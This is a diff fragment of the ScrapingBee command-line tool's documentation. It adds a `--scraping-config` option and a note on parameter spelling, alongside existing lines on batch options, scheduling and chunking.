- **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
84
+ **Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
85
+
86
+ **Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
85
87
 
86
88
  ### Commands
87
89
 
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
117
119
  - **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
118
120
  - **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
119
121
  - **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
122
+ - **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
120
123
 
121
124
  ### Examples
122
125
 
File without changes